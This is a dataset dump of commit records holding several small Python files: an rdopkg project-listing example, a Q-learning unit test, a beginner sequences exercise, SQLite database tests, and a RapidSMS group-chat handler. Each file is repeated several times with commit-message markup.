|
2ebf725edef293a87b6cf073fabb18bf4a7a8227
|
examples/rdo_projects.py
|
examples/rdo_projects.py
|
#!/usr/bin/env python
"""
An example script that uses rdopkg.actionmods.rdoinfo to output a list of
currently maintained RDO projects.
"""
from rdopkg.actionmods import rdoinfo
def list_projects():
inforepo = rdoinfo.get_default_inforepo()
info = inforepo.get_info()
pkgs = info['packages']
pkg_filter = {
'name': '^openstack-'
}
pkgs = rdoinfo.filter_pkgs(pkgs, pkg_filter)
for pkg in pkgs:
project = pkg.get('project') or pkg['name']
print("### " + project)
print("package: " + pkg['name'])
print("code: " + pkg['upstream'])
print("maintainers: " + " ".join(pkg['maintainers']))
print("")
if __name__ == '__main__':
list_projects()
|
Add an example of rdoinfo frontend usage
|
Add an example of rdoinfo frontend usage
|
Python
|
apache-2.0
|
redhat-openstack/rdopkg,redhat-openstack/rdopkg,openstack-packages/rdopkg,openstack-packages/rdopkg
|
Add an example of rdoinfo frontend usage
|
#!/usr/bin/env python
"""
An example script that uses rdopkg.actionmods.rdoinfo to output a list of
currently maintained RDO projects.
"""
from rdopkg.actionmods import rdoinfo
def list_projects():
inforepo = rdoinfo.get_default_inforepo()
info = inforepo.get_info()
pkgs = info['packages']
pkg_filter = {
'name': '^openstack-'
}
pkgs = rdoinfo.filter_pkgs(pkgs, pkg_filter)
for pkg in pkgs:
project = pkg.get('project') or pkg['name']
print("### " + project)
print("package: " + pkg['name'])
print("code: " + pkg['upstream'])
print("maintainers: " + " ".join(pkg['maintainers']))
print("")
if __name__ == '__main__':
list_projects()
|
<commit_before><commit_msg>Add an example of rdoinfo frontend usage<commit_after>
|
#!/usr/bin/env python
"""
An example script that uses rdopkg.actionmods.rdoinfo to output a list of
currently maintained RDO projects.
"""
from rdopkg.actionmods import rdoinfo
def list_projects():
inforepo = rdoinfo.get_default_inforepo()
info = inforepo.get_info()
pkgs = info['packages']
pkg_filter = {
'name': '^openstack-'
}
pkgs = rdoinfo.filter_pkgs(pkgs, pkg_filter)
for pkg in pkgs:
project = pkg.get('project') or pkg['name']
print("### " + project)
print("package: " + pkg['name'])
print("code: " + pkg['upstream'])
print("maintainers: " + " ".join(pkg['maintainers']))
print("")
if __name__ == '__main__':
list_projects()
|
Add an example of rdoinfo frontend usage#!/usr/bin/env python
"""
An example script that uses rdopkg.actionmods.rdoinfo to output a list of
currently maintained RDO projects.
"""
from rdopkg.actionmods import rdoinfo
def list_projects():
inforepo = rdoinfo.get_default_inforepo()
info = inforepo.get_info()
pkgs = info['packages']
pkg_filter = {
'name': '^openstack-'
}
pkgs = rdoinfo.filter_pkgs(pkgs, pkg_filter)
for pkg in pkgs:
project = pkg.get('project') or pkg['name']
print("### " + project)
print("package: " + pkg['name'])
print("code: " + pkg['upstream'])
print("maintainers: " + " ".join(pkg['maintainers']))
print("")
if __name__ == '__main__':
list_projects()
|
<commit_before><commit_msg>Add an example of rdoinfo frontend usage<commit_after>#!/usr/bin/env python
"""
An example script that uses rdopkg.actionmods.rdoinfo to output a list of
currently maintained RDO projects.
"""
from rdopkg.actionmods import rdoinfo
def list_projects():
inforepo = rdoinfo.get_default_inforepo()
info = inforepo.get_info()
pkgs = info['packages']
pkg_filter = {
'name': '^openstack-'
}
pkgs = rdoinfo.filter_pkgs(pkgs, pkg_filter)
for pkg in pkgs:
project = pkg.get('project') or pkg['name']
print("### " + project)
print("package: " + pkg['name'])
print("code: " + pkg['upstream'])
print("maintainers: " + " ".join(pkg['maintainers']))
print("")
if __name__ == '__main__':
list_projects()
|
|
ee0d901f0eb8c098e715485efb7d43ade4a8aeb8
|
tests/test_nsq.py
|
tests/test_nsq.py
|
import os
import unittest
import numpy as np
import chainer
from chainer import optimizers
import q_function
import nstep_q_learning
import async
import simple_abc
import random_seed
import replay_buffer
from simple_abc import ABC
class TestNSQ(unittest.TestCase):
def setUp(self):
pass
def test_abc(self):
self._test_abc(1)
self._test_abc(5)
def _test_abc(self, t_max):
nproc = 8
def agent_func():
n_actions = 3
q_func = q_function.FCSIQFunction(1, n_actions, 10, 2)
opt = optimizers.RMSprop(1e-3, eps=1e-2)
opt.setup(q_func)
return nstep_q_learning.NStepQLearning(q_func, opt, t_max,
0.9, 0.1,
i_target=10)
def env_func():
return simple_abc.ABC()
def run_func(agent, env):
total_r = 0
episode_r = 0
for i in xrange(5000):
total_r += env.reward
episode_r += env.reward
action = agent.act(env.state, env.reward, env.is_terminal)
if env.is_terminal:
print 'i:{} episode_r:{}'.format(i, episode_r)
episode_r = 0
env.initialize()
else:
env.receive_action(action)
print 'pid:{}, total_r:{}'.format(os.getpid(), total_r)
return agent
# Train
final_agent = async.run_async(nproc, agent_func, env_func, run_func)
# Test
env = env_func()
total_r = env.reward
while not env.is_terminal:
action = final_agent.q_function.sample_greedily_with_value(
env.state.reshape((1,) + env.state.shape))[0][0]
print 'state:', env.state, 'action:', action
env.receive_action(action)
total_r += env.reward
self.assertAlmostEqual(total_r, 1)
|
Add a ABC test for n-step Q-learning
|
Add a ABC test for n-step Q-learning
|
Python
|
mit
|
toslunar/chainerrl,toslunar/chainerrl
|
Add a ABC test for n-step Q-learning
|
import os
import unittest
import numpy as np
import chainer
from chainer import optimizers
import q_function
import nstep_q_learning
import async
import simple_abc
import random_seed
import replay_buffer
from simple_abc import ABC
class TestNSQ(unittest.TestCase):
def setUp(self):
pass
def test_abc(self):
self._test_abc(1)
self._test_abc(5)
def _test_abc(self, t_max):
nproc = 8
def agent_func():
n_actions = 3
q_func = q_function.FCSIQFunction(1, n_actions, 10, 2)
opt = optimizers.RMSprop(1e-3, eps=1e-2)
opt.setup(q_func)
return nstep_q_learning.NStepQLearning(q_func, opt, t_max,
0.9, 0.1,
i_target=10)
def env_func():
return simple_abc.ABC()
def run_func(agent, env):
total_r = 0
episode_r = 0
for i in xrange(5000):
total_r += env.reward
episode_r += env.reward
action = agent.act(env.state, env.reward, env.is_terminal)
if env.is_terminal:
print 'i:{} episode_r:{}'.format(i, episode_r)
episode_r = 0
env.initialize()
else:
env.receive_action(action)
print 'pid:{}, total_r:{}'.format(os.getpid(), total_r)
return agent
# Train
final_agent = async.run_async(nproc, agent_func, env_func, run_func)
# Test
env = env_func()
total_r = env.reward
while not env.is_terminal:
action = final_agent.q_function.sample_greedily_with_value(
env.state.reshape((1,) + env.state.shape))[0][0]
print 'state:', env.state, 'action:', action
env.receive_action(action)
total_r += env.reward
self.assertAlmostEqual(total_r, 1)
|
<commit_before><commit_msg>Add a ABC test for n-step Q-learning<commit_after>
|
import os
import unittest
import numpy as np
import chainer
from chainer import optimizers
import q_function
import nstep_q_learning
import async
import simple_abc
import random_seed
import replay_buffer
from simple_abc import ABC
class TestNSQ(unittest.TestCase):
def setUp(self):
pass
def test_abc(self):
self._test_abc(1)
self._test_abc(5)
def _test_abc(self, t_max):
nproc = 8
def agent_func():
n_actions = 3
q_func = q_function.FCSIQFunction(1, n_actions, 10, 2)
opt = optimizers.RMSprop(1e-3, eps=1e-2)
opt.setup(q_func)
return nstep_q_learning.NStepQLearning(q_func, opt, t_max,
0.9, 0.1,
i_target=10)
def env_func():
return simple_abc.ABC()
def run_func(agent, env):
total_r = 0
episode_r = 0
for i in xrange(5000):
total_r += env.reward
episode_r += env.reward
action = agent.act(env.state, env.reward, env.is_terminal)
if env.is_terminal:
print 'i:{} episode_r:{}'.format(i, episode_r)
episode_r = 0
env.initialize()
else:
env.receive_action(action)
print 'pid:{}, total_r:{}'.format(os.getpid(), total_r)
return agent
# Train
final_agent = async.run_async(nproc, agent_func, env_func, run_func)
# Test
env = env_func()
total_r = env.reward
while not env.is_terminal:
action = final_agent.q_function.sample_greedily_with_value(
env.state.reshape((1,) + env.state.shape))[0][0]
print 'state:', env.state, 'action:', action
env.receive_action(action)
total_r += env.reward
self.assertAlmostEqual(total_r, 1)
|
Add a ABC test for n-step Q-learningimport os
import unittest
import numpy as np
import chainer
from chainer import optimizers
import q_function
import nstep_q_learning
import async
import simple_abc
import random_seed
import replay_buffer
from simple_abc import ABC
class TestNSQ(unittest.TestCase):
def setUp(self):
pass
def test_abc(self):
self._test_abc(1)
self._test_abc(5)
def _test_abc(self, t_max):
nproc = 8
def agent_func():
n_actions = 3
q_func = q_function.FCSIQFunction(1, n_actions, 10, 2)
opt = optimizers.RMSprop(1e-3, eps=1e-2)
opt.setup(q_func)
return nstep_q_learning.NStepQLearning(q_func, opt, t_max,
0.9, 0.1,
i_target=10)
def env_func():
return simple_abc.ABC()
def run_func(agent, env):
total_r = 0
episode_r = 0
for i in xrange(5000):
total_r += env.reward
episode_r += env.reward
action = agent.act(env.state, env.reward, env.is_terminal)
if env.is_terminal:
print 'i:{} episode_r:{}'.format(i, episode_r)
episode_r = 0
env.initialize()
else:
env.receive_action(action)
print 'pid:{}, total_r:{}'.format(os.getpid(), total_r)
return agent
# Train
final_agent = async.run_async(nproc, agent_func, env_func, run_func)
# Test
env = env_func()
total_r = env.reward
while not env.is_terminal:
action = final_agent.q_function.sample_greedily_with_value(
env.state.reshape((1,) + env.state.shape))[0][0]
print 'state:', env.state, 'action:', action
env.receive_action(action)
total_r += env.reward
self.assertAlmostEqual(total_r, 1)
|
<commit_before><commit_msg>Add a ABC test for n-step Q-learning<commit_after>import os
import unittest
import numpy as np
import chainer
from chainer import optimizers
import q_function
import nstep_q_learning
import async
import simple_abc
import random_seed
import replay_buffer
from simple_abc import ABC
class TestNSQ(unittest.TestCase):
def setUp(self):
pass
def test_abc(self):
self._test_abc(1)
self._test_abc(5)
def _test_abc(self, t_max):
nproc = 8
def agent_func():
n_actions = 3
q_func = q_function.FCSIQFunction(1, n_actions, 10, 2)
opt = optimizers.RMSprop(1e-3, eps=1e-2)
opt.setup(q_func)
return nstep_q_learning.NStepQLearning(q_func, opt, t_max,
0.9, 0.1,
i_target=10)
def env_func():
return simple_abc.ABC()
def run_func(agent, env):
total_r = 0
episode_r = 0
for i in xrange(5000):
total_r += env.reward
episode_r += env.reward
action = agent.act(env.state, env.reward, env.is_terminal)
if env.is_terminal:
print 'i:{} episode_r:{}'.format(i, episode_r)
episode_r = 0
env.initialize()
else:
env.receive_action(action)
print 'pid:{}, total_r:{}'.format(os.getpid(), total_r)
return agent
# Train
final_agent = async.run_async(nproc, agent_func, env_func, run_func)
# Test
env = env_func()
total_r = env.reward
while not env.is_terminal:
action = final_agent.q_function.sample_greedily_with_value(
env.state.reshape((1,) + env.state.shape))[0][0]
print 'state:', env.state, 'action:', action
env.receive_action(action)
total_r += env.reward
self.assertAlmostEqual(total_r, 1)
|
|
82ac3a4300dcde07402dd6e5ce50cafa39f4a243
|
training/level-1-the-zen-of-python/dragon-warrior/ST_sequences.py
|
training/level-1-the-zen-of-python/dragon-warrior/ST_sequences.py
|
my_list = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
print (my_list[2])
print(len(my_list))
print(min(my_list))
print(max(my_list))
test_tuple = (1, 2, 3, 4, 5, 6, 7, 8, 9, 10)
print(test_tuple[-4])
test_string = "mystring is here"
print(test_string)
print(list(test_string[-4:2]))
test_range = range(100)
print(list(test_range[8:66:-2]))
my_list.append('hello')
print(my_list)
print(my_list.count(4))
print(523 in test_range)
for number in test_range:
if number == 5:
print(number)
else:
print ("nope")
pass
|
Solve world issue for humanity
|
Solve world issue for humanity
|
Python
|
artistic-2.0
|
bigfatpanda-training/pandas-practical-python-primer,bigfatpanda-training/pandas-practical-python-primer
|
Solve world issue for humanity
|
my_list = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
print (my_list[2])
print(len(my_list))
print(min(my_list))
print(max(my_list))
test_tuple = (1, 2, 3, 4, 5, 6, 7, 8, 9, 10)
print(test_tuple[-4])
test_string = "mystring is here"
print(test_string)
print(list(test_string[-4:2]))
test_range = range(100)
print(list(test_range[8:66:-2]))
my_list.append('hello')
print(my_list)
print(my_list.count(4))
print(523 in test_range)
for number in test_range:
if number == 5:
print(number)
else:
print ("nope")
pass
|
<commit_before><commit_msg>Solve world issue for humanity<commit_after>
|
my_list = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
print (my_list[2])
print(len(my_list))
print(min(my_list))
print(max(my_list))
test_tuple = (1, 2, 3, 4, 5, 6, 7, 8, 9, 10)
print(test_tuple[-4])
test_string = "mystring is here"
print(test_string)
print(list(test_string[-4:2]))
test_range = range(100)
print(list(test_range[8:66:-2]))
my_list.append('hello')
print(my_list)
print(my_list.count(4))
print(523 in test_range)
for number in test_range:
if number == 5:
print(number)
else:
print ("nope")
pass
|
Solve world issue for humanitymy_list = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
print (my_list[2])
print(len(my_list))
print(min(my_list))
print(max(my_list))
test_tuple = (1, 2, 3, 4, 5, 6, 7, 8, 9, 10)
print(test_tuple[-4])
test_string = "mystring is here"
print(test_string)
print(list(test_string[-4:2]))
test_range = range(100)
print(list(test_range[8:66:-2]))
my_list.append('hello')
print(my_list)
print(my_list.count(4))
print(523 in test_range)
for number in test_range:
if number == 5:
print(number)
else:
print ("nope")
pass
|
<commit_before><commit_msg>Solve world issue for humanity<commit_after>my_list = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
print (my_list[2])
print(len(my_list))
print(min(my_list))
print(max(my_list))
test_tuple = (1, 2, 3, 4, 5, 6, 7, 8, 9, 10)
print(test_tuple[-4])
test_string = "mystring is here"
print(test_string)
print(list(test_string[-4:2]))
test_range = range(100)
print(list(test_range[8:66:-2]))
my_list.append('hello')
print(my_list)
print(my_list.count(4))
print(523 in test_range)
for number in test_range:
if number == 5:
print(number)
else:
print ("nope")
pass
|
|
141421a868afbbf2e92c426202bbba8b49d55a38
|
tests/test_db.py
|
tests/test_db.py
|
# -*- coding: utf-8 -*-
"""Test database functionality."""
import sqlite3
import tempfile
import unittest
from contextlib import closing
from sqlalchemy.exc import NoSuchTableError
from sqlalchemy.types import (
INTEGER,
TEXT,
)
from esis.db import Database
class DatabaseTest(unittest.TestCase):
"""Database wrapper test cases."""
def test_get_table_metadata(self):
"""Table metadata can be retrieved using index notation."""
with tempfile.NamedTemporaryFile() as db_file:
with closing(sqlite3.connect(db_file.name)) as connection:
with closing(connection.cursor()) as cursor:
cursor.execute(
'CREATE TABLE messages (id INTEGER, message TEXT)')
database = Database(db_file.name)
table = database['messages']
schema = {column.name: type(column.type)
for column in table.columns}
self.assertDictEqual(
schema,
{'id': INTEGER, 'message': TEXT})
def test_get_unknown_table_metadata(self):
"""NoSuchTableError raised when table name is not found."""
with tempfile.NamedTemporaryFile() as db_file:
with closing(sqlite3.connect(db_file.name)) as connection:
with closing(connection.cursor()) as cursor:
cursor.execute(
'CREATE TABLE messages (id INTEGER, message TEXT)')
database = Database(db_file.name)
with self.assertRaises(NoSuchTableError):
database['unknown']
def test_run_quick_check_passes(self):
"""Quick check passes for SQLite database."""
with tempfile.NamedTemporaryFile() as db_file:
with closing(sqlite3.connect(db_file.name)) as connection:
with closing(connection.cursor()) as cursor:
cursor.execute(
'CREATE TABLE messages (id INTEGER, message TEXT)')
with Database(db_file.name) as database:
self.assertTrue(database.run_quick_check())
def test_run_quick_check_fails(self):
"""Quick check fails for non SQLite dtabase files."""
with tempfile.NamedTemporaryFile() as db_file:
db_file.write('this is a text file, not a database file')
db_file.flush()
with Database(db_file.name) as database:
self.assertFalse(database.run_quick_check())
def test_context_manager(self):
"""Connection is opened/closed when used as a context manager."""
database = Database(':memory:')
# Connection is None when database object is created
self.assertIsNone(database.connection)
with database:
# Connection is not closed inside the context
self.assertFalse(database.connection.closed)
# Connection is closed outside the context
self.assertTrue(database.connection.closed)
|
Add a few Database test cases
|
Add a few Database test cases
|
Python
|
mit
|
jcollado/esis
|
Add a few Database test cases
|
# -*- coding: utf-8 -*-
"""Test database functionality."""
import sqlite3
import tempfile
import unittest
from contextlib import closing
from sqlalchemy.exc import NoSuchTableError
from sqlalchemy.types import (
INTEGER,
TEXT,
)
from esis.db import Database
class DatabaseTest(unittest.TestCase):
"""Database wrapper test cases."""
def test_get_table_metadata(self):
"""Table metadata can be retrieved using index notation."""
with tempfile.NamedTemporaryFile() as db_file:
with closing(sqlite3.connect(db_file.name)) as connection:
with closing(connection.cursor()) as cursor:
cursor.execute(
'CREATE TABLE messages (id INTEGER, message TEXT)')
database = Database(db_file.name)
table = database['messages']
schema = {column.name: type(column.type)
for column in table.columns}
self.assertDictEqual(
schema,
{'id': INTEGER, 'message': TEXT})
def test_get_unknown_table_metadata(self):
"""NoSuchTableError raised when table name is not found."""
with tempfile.NamedTemporaryFile() as db_file:
with closing(sqlite3.connect(db_file.name)) as connection:
with closing(connection.cursor()) as cursor:
cursor.execute(
'CREATE TABLE messages (id INTEGER, message TEXT)')
database = Database(db_file.name)
with self.assertRaises(NoSuchTableError):
database['unknown']
def test_run_quick_check_passes(self):
"""Quick check passes for SQLite database."""
with tempfile.NamedTemporaryFile() as db_file:
with closing(sqlite3.connect(db_file.name)) as connection:
with closing(connection.cursor()) as cursor:
cursor.execute(
'CREATE TABLE messages (id INTEGER, message TEXT)')
with Database(db_file.name) as database:
self.assertTrue(database.run_quick_check())
def test_run_quick_check_fails(self):
"""Quick check fails for non SQLite dtabase files."""
with tempfile.NamedTemporaryFile() as db_file:
db_file.write('this is a text file, not a database file')
db_file.flush()
with Database(db_file.name) as database:
self.assertFalse(database.run_quick_check())
def test_context_manager(self):
"""Connection is opened/closed when used as a context manager."""
database = Database(':memory:')
# Connection is None when database object is created
self.assertIsNone(database.connection)
with database:
# Connection is not closed inside the context
self.assertFalse(database.connection.closed)
# Connection is closed outside the context
self.assertTrue(database.connection.closed)
|
<commit_before><commit_msg>Add a few Database test cases<commit_after>
|
# -*- coding: utf-8 -*-
"""Test database functionality."""
import sqlite3
import tempfile
import unittest
from contextlib import closing
from sqlalchemy.exc import NoSuchTableError
from sqlalchemy.types import (
INTEGER,
TEXT,
)
from esis.db import Database
class DatabaseTest(unittest.TestCase):
"""Database wrapper test cases."""
def test_get_table_metadata(self):
"""Table metadata can be retrieved using index notation."""
with tempfile.NamedTemporaryFile() as db_file:
with closing(sqlite3.connect(db_file.name)) as connection:
with closing(connection.cursor()) as cursor:
cursor.execute(
'CREATE TABLE messages (id INTEGER, message TEXT)')
database = Database(db_file.name)
table = database['messages']
schema = {column.name: type(column.type)
for column in table.columns}
self.assertDictEqual(
schema,
{'id': INTEGER, 'message': TEXT})
def test_get_unknown_table_metadata(self):
"""NoSuchTableError raised when table name is not found."""
with tempfile.NamedTemporaryFile() as db_file:
with closing(sqlite3.connect(db_file.name)) as connection:
with closing(connection.cursor()) as cursor:
cursor.execute(
'CREATE TABLE messages (id INTEGER, message TEXT)')
database = Database(db_file.name)
with self.assertRaises(NoSuchTableError):
database['unknown']
def test_run_quick_check_passes(self):
"""Quick check passes for SQLite database."""
with tempfile.NamedTemporaryFile() as db_file:
with closing(sqlite3.connect(db_file.name)) as connection:
with closing(connection.cursor()) as cursor:
cursor.execute(
'CREATE TABLE messages (id INTEGER, message TEXT)')
with Database(db_file.name) as database:
self.assertTrue(database.run_quick_check())
def test_run_quick_check_fails(self):
"""Quick check fails for non SQLite dtabase files."""
with tempfile.NamedTemporaryFile() as db_file:
db_file.write('this is a text file, not a database file')
db_file.flush()
with Database(db_file.name) as database:
self.assertFalse(database.run_quick_check())
def test_context_manager(self):
"""Connection is opened/closed when used as a context manager."""
database = Database(':memory:')
# Connection is None when database object is created
self.assertIsNone(database.connection)
with database:
# Connection is not closed inside the context
self.assertFalse(database.connection.closed)
# Connection is closed outside the context
self.assertTrue(database.connection.closed)
|
Add a few Database test cases# -*- coding: utf-8 -*-
"""Test database functionality."""
import sqlite3
import tempfile
import unittest
from contextlib import closing
from sqlalchemy.exc import NoSuchTableError
from sqlalchemy.types import (
INTEGER,
TEXT,
)
from esis.db import Database
class DatabaseTest(unittest.TestCase):
"""Database wrapper test cases."""
def test_get_table_metadata(self):
"""Table metadata can be retrieved using index notation."""
with tempfile.NamedTemporaryFile() as db_file:
with closing(sqlite3.connect(db_file.name)) as connection:
with closing(connection.cursor()) as cursor:
cursor.execute(
'CREATE TABLE messages (id INTEGER, message TEXT)')
database = Database(db_file.name)
table = database['messages']
schema = {column.name: type(column.type)
for column in table.columns}
self.assertDictEqual(
schema,
{'id': INTEGER, 'message': TEXT})
def test_get_unknown_table_metadata(self):
"""NoSuchTableError raised when table name is not found."""
with tempfile.NamedTemporaryFile() as db_file:
with closing(sqlite3.connect(db_file.name)) as connection:
with closing(connection.cursor()) as cursor:
cursor.execute(
'CREATE TABLE messages (id INTEGER, message TEXT)')
database = Database(db_file.name)
with self.assertRaises(NoSuchTableError):
database['unknown']
def test_run_quick_check_passes(self):
"""Quick check passes for SQLite database."""
with tempfile.NamedTemporaryFile() as db_file:
with closing(sqlite3.connect(db_file.name)) as connection:
with closing(connection.cursor()) as cursor:
cursor.execute(
'CREATE TABLE messages (id INTEGER, message TEXT)')
with Database(db_file.name) as database:
self.assertTrue(database.run_quick_check())
def test_run_quick_check_fails(self):
"""Quick check fails for non SQLite dtabase files."""
with tempfile.NamedTemporaryFile() as db_file:
db_file.write('this is a text file, not a database file')
db_file.flush()
with Database(db_file.name) as database:
self.assertFalse(database.run_quick_check())
def test_context_manager(self):
"""Connection is opened/closed when used as a context manager."""
database = Database(':memory:')
# Connection is None when database object is created
self.assertIsNone(database.connection)
with database:
# Connection is not closed inside the context
self.assertFalse(database.connection.closed)
# Connection is closed outside the context
self.assertTrue(database.connection.closed)
|
<commit_before><commit_msg>Add a few Database test cases<commit_after># -*- coding: utf-8 -*-
"""Test database functionality."""
import sqlite3
import tempfile
import unittest
from contextlib import closing
from sqlalchemy.exc import NoSuchTableError
from sqlalchemy.types import (
INTEGER,
TEXT,
)
from esis.db import Database
class DatabaseTest(unittest.TestCase):
"""Database wrapper test cases."""
def test_get_table_metadata(self):
"""Table metadata can be retrieved using index notation."""
with tempfile.NamedTemporaryFile() as db_file:
with closing(sqlite3.connect(db_file.name)) as connection:
with closing(connection.cursor()) as cursor:
cursor.execute(
'CREATE TABLE messages (id INTEGER, message TEXT)')
database = Database(db_file.name)
table = database['messages']
schema = {column.name: type(column.type)
for column in table.columns}
self.assertDictEqual(
schema,
{'id': INTEGER, 'message': TEXT})
def test_get_unknown_table_metadata(self):
"""NoSuchTableError raised when table name is not found."""
with tempfile.NamedTemporaryFile() as db_file:
with closing(sqlite3.connect(db_file.name)) as connection:
with closing(connection.cursor()) as cursor:
cursor.execute(
'CREATE TABLE messages (id INTEGER, message TEXT)')
database = Database(db_file.name)
with self.assertRaises(NoSuchTableError):
database['unknown']
def test_run_quick_check_passes(self):
"""Quick check passes for SQLite database."""
with tempfile.NamedTemporaryFile() as db_file:
with closing(sqlite3.connect(db_file.name)) as connection:
with closing(connection.cursor()) as cursor:
cursor.execute(
'CREATE TABLE messages (id INTEGER, message TEXT)')
with Database(db_file.name) as database:
self.assertTrue(database.run_quick_check())
def test_run_quick_check_fails(self):
"""Quick check fails for non SQLite dtabase files."""
with tempfile.NamedTemporaryFile() as db_file:
db_file.write('this is a text file, not a database file')
db_file.flush()
with Database(db_file.name) as database:
self.assertFalse(database.run_quick_check())
def test_context_manager(self):
"""Connection is opened/closed when used as a context manager."""
database = Database(':memory:')
# Connection is None when database object is created
self.assertIsNone(database.connection)
with database:
# Connection is not closed inside the context
self.assertFalse(database.connection.closed)
# Connection is closed outside the context
self.assertTrue(database.connection.closed)
|
|
e752e38c25f90065acc8b3c52a98bd0e1f4f3ebc
|
timelines/app.py
|
timelines/app.py
|
#!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
from rapidsms.apps.base import AppBase
from rapidsms.models import Connection
#from rapidsms.contrib.messagelog.models import Message
from .models import Reporter
class Chat(AppBase):
def _send_chat_msg(self, msg):
if msg.contact is None:
msg.respond('Sorry you must be a registered reporter')
return
reporter = Reporter.objects.filter(contact=msg.contact)
if not reporter:
msg.respond('Sorry you must be a registered reporter')
return
reporter = reporter[0]
if reporter.facility:
recipients = set(Connection.objects.filter(
contact__in=Reporter.objects.filter(
facility=reporter.facility).values_list('contact', flat=True)
))
else:
msg.respond("Sorry, you're not registered to a facility")
recipients.discard(msg.connection)
sender = msg.connection.identity
text = "{0}: {1}".format(sender, msg.text)
# respond to sender
sender_text = "sent to {0} members of {1}".format(len(recipients),
reporter.facility)
msg.respond(sender_text)
# 'respond' to group members
msg.respond(text, connections=list(recipients))
def handle(self, msg):
groups = []
mentions = []
for token in msg.text.split():
if token.startswith("#"):
groups.append(token[1:])
if token.startswith("@"):
mentions.append(token[1:])
groups = [i.lower() for i in groups]
mentions = [i.lower() for i in mentions]
if 'chat' in groups or 'chat' in mentions:
# we got a match for chat send message to guys from
# sender's facility
self._send_chat_msg(msg)
return True
|
Add group chatting capability with the use special group chat
|
Add group chatting capability with the use special group chat
|
Python
|
bsd-3-clause
|
ewheeler/rapidsms-timelines,ewheeler/rapidsms-timelines,ewheeler/rapidsms-timelines
|
Add group chatting capability with the use special group chat
|
#!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
from rapidsms.apps.base import AppBase
from rapidsms.models import Connection
#from rapidsms.contrib.messagelog.models import Message
from .models import Reporter
class Chat(AppBase):
def _send_chat_msg(self, msg):
if msg.contact is None:
msg.respond('Sorry you must be a registered reporter')
return
reporter = Reporter.objects.filter(contact=msg.contact)
if not reporter:
msg.respond('Sorry you must be a registered reporter')
return
reporter = reporter[0]
if reporter.facility:
recipients = set(Connection.objects.filter(
contact__in=Reporter.objects.filter(
facility=reporter.facility).values_list('contact', flat=True)
))
else:
msg.respond("Sorry, you're not registered to a facility")
recipients.discard(msg.connection)
sender = msg.connection.identity
text = "{0}: {1}".format(sender, msg.text)
# respond to sender
sender_text = "sent to {0} members of {1}".format(len(recipients),
reporter.facility)
msg.respond(sender_text)
# 'respond' to group members
msg.respond(text, connections=list(recipients))
def handle(self, msg):
groups = []
mentions = []
for token in msg.text.split():
if token.startswith("#"):
groups.append(token[1:])
if token.startswith("@"):
mentions.append(token[1:])
groups = [i.lower() for i in groups]
mentions = [i.lower() for i in mentions]
if 'chat' in groups or 'chat' in mentions:
# we got a match for chat send message to guys from
# sender's facility
self._send_chat_msg(msg)
return True
|
<commit_before><commit_msg>Add group chatting capability with the use special group chat<commit_after>
|
#!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
from rapidsms.apps.base import AppBase
from rapidsms.models import Connection
#from rapidsms.contrib.messagelog.models import Message
from .models import Reporter
class Chat(AppBase):
def _send_chat_msg(self, msg):
if msg.contact is None:
msg.respond('Sorry you must be a registered reporter')
return
reporter = Reporter.objects.filter(contact=msg.contact)
if not reporter:
msg.respond('Sorry you must be a registered reporter')
return
reporter = reporter[0]
if reporter.facility:
recipients = set(Connection.objects.filter(
contact__in=Reporter.objects.filter(
facility=reporter.facility).values_list('contact', flat=True)
))
else:
msg.respond("Sorry, you're not registered to a facility")
recipients.discard(msg.connection)
sender = msg.connection.identity
text = "{0}: {1}".format(sender, msg.text)
# respond to sender
sender_text = "sent to {0} members of {1}".format(len(recipients),
reporter.facility)
msg.respond(sender_text)
# 'respond' to group members
msg.respond(text, connections=list(recipients))
def handle(self, msg):
groups = []
mentions = []
for token in msg.text.split():
if token.startswith("#"):
groups.append(token[1:])
if token.startswith("@"):
mentions.append(token[1:])
groups = [i.lower() for i in groups]
mentions = [i.lower() for i in mentions]
if 'chat' in groups or 'chat' in mentions:
# we got a match for chat send message to guys from
# sender's facility
self._send_chat_msg(msg)
return True
|
Add group chatting capability with the use special group chat#!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
from rapidsms.apps.base import AppBase
from rapidsms.models import Connection
#from rapidsms.contrib.messagelog.models import Message
from .models import Reporter
class Chat(AppBase):
def _send_chat_msg(self, msg):
if msg.contact is None:
msg.respond('Sorry you must be a registered reporter')
return
reporter = Reporter.objects.filter(contact=msg.contact)
if not reporter:
msg.respond('Sorry you must be a registered reporter')
return
reporter = reporter[0]
if reporter.facility:
recipients = set(Connection.objects.filter(
contact__in=Reporter.objects.filter(
facility=reporter.facility).values_list('contact', flat=True)
))
else:
msg.respond("Sorry, you're not registered to a facility")
recipients.discard(msg.connection)
sender = msg.connection.identity
text = "{0}: {1}".format(sender, msg.text)
# respond to sender
sender_text = "sent to {0} members of {1}".format(len(recipients),
reporter.facility)
msg.respond(sender_text)
# 'respond' to group members
msg.respond(text, connections=list(recipients))
def handle(self, msg):
groups = []
mentions = []
for token in msg.text.split():
if token.startswith("#"):
groups.append(token[1:])
if token.startswith("@"):
mentions.append(token[1:])
groups = [i.lower() for i in groups]
mentions = [i.lower() for i in mentions]
if 'chat' in groups or 'chat' in mentions:
# we got a match for chat send message to guys from
# sender's facility
self._send_chat_msg(msg)
return True
|
<commit_before><commit_msg>Add group chatting capability with the use special group chat<commit_after>#!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
from rapidsms.apps.base import AppBase
from rapidsms.models import Connection
#from rapidsms.contrib.messagelog.models import Message
from .models import Reporter
class Chat(AppBase):
def _send_chat_msg(self, msg):
if msg.contact is None:
msg.respond('Sorry you must be a registered reporter')
return
reporter = Reporter.objects.filter(contact=msg.contact)
if not reporter:
msg.respond('Sorry you must be a registered reporter')
return
reporter = reporter[0]
if reporter.facility:
recipients = set(Connection.objects.filter(
contact__in=Reporter.objects.filter(
facility=reporter.facility).values_list('contact', flat=True)
))
else:
msg.respond("Sorry, you're not registered to a facility")
recipients.discard(msg.connection)
sender = msg.connection.identity
text = "{0}: {1}".format(sender, msg.text)
# respond to sender
sender_text = "sent to {0} members of {1}".format(len(recipients),
reporter.facility)
msg.respond(sender_text)
# 'respond' to group members
msg.respond(text, connections=list(recipients))
def handle(self, msg):
groups = []
mentions = []
